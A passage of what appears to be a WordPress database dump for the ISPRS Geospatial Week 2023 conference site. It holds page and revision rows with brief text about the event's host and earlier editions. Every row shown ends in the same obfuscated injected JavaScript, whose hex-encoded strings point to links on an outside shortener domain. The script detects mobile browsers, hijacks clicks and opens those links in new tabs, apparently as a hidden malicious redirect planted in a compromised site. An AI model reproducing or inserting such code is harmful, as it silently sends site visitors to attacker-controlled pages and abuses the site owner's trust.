Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The ISPRS Geospatial Week (GSW)','','publish','closed','closed','','the-isprs-geospatial-week-gsw','','','2023-02-05 08:43:38','2023-02-05 08:43:38','',0,'https://gsw2023.com/?page_id=2631',0,'page','',0),
(2633,1,'2022-10-09 00:38:29','2022-10-09 00:38:29','[vc_row][vc_column][bsf-info-box icon_size=\"32\"]&lt;h5style=\"text-align:justify; color:black;\" &gt;<strong>Science, Technology and Maritime Transport acting as local organiser and host The ISPRS Geospatial Week (GSW) is a combination of workshops organised by about 30 ISPRS Working Groups active in areas of interest of ISPRS. It is convened by the Arab Academy for, and led by Prof. Naser El-Sheimy as GSW Director.</strong>\r\n<h5 style=\"text-align: justify; color: black;\"><strong>The ISPRS Geospatial Week is held biennially in odd years. The GSW 2023 is the fifth edition, after Antalya 2013, Montpellier 2015, Wuhan 2017, and Enschede 2019.</strong></h5>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The ISPRS Geospatial Week (GSW)','','inherit','closed','closed','','2631-revision-v1','','','2022-10-09 00:38:29','2022-10-09 00:38:29','',2631,'https://gsw2023.com/?p=2633',0,'revision','',0),
(2634,1,'2022-10-09 00:40:41','2022-10-09 00:40:41','[vc_row][vc_column][bsf-info-box icon_size=\"32\"]&lt;h5 style=\"text-align:justify; color:black;\" &gt;<strong>Science, Technology and Maritime Transport acting as local organiser and host The ISPRS Geospatial Week (GSW) is a combination of workshops organised by about 30 ISPRS Working Groups active in areas of interest of ISPRS. It is convened by the Arab Academy for, and led by Prof. Naser El-Sheimy as GSW Director.</strong>\r\n<h5 style=\"text-align: justify; color: black;\"><strong>The ISPRS Geospatial Week is held biennially in odd years. The GSW 2023 is the fifth edition, after Antalya 2013, Montpellier 2015, Wuhan 2017, and Enschede 2019.</strong></h5>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The ISPRS Geospatial Week (GSW)','','inherit','closed','closed','','2631-revision-v1','','','2022-10-09 00:40:41','2022-10-09 00:40:41','',2631,'https://gsw2023.com/?p=2634',0,'revision','',0),
(2635,1,'2022-10-09 00:42:58','2022-10-09 00:42:58','[vc_row][vc_column][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: black;\">&gt;<strong>Science, Technology and Maritime Transport acting as local organiser and host The ISPRS Geospatial Week (GSW) is a combination of workshops organised by about 30 ISPRS Working Groups active in areas of interest of ISPRS. It is convened by the Arab Academy for, and led by Prof. Naser El-Sheimy as GSW Director.</strong></h5>\r\n<h5 style=\"text-align: justify; color: black;\"><strong>The ISPRS Geospatial Week is held biennially in odd years. The GSW 2023 is the fifth edition, after Antalya 2013, Montpellier 2015, Wuhan 2017, and Enschede 2019.</strong></h5>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const 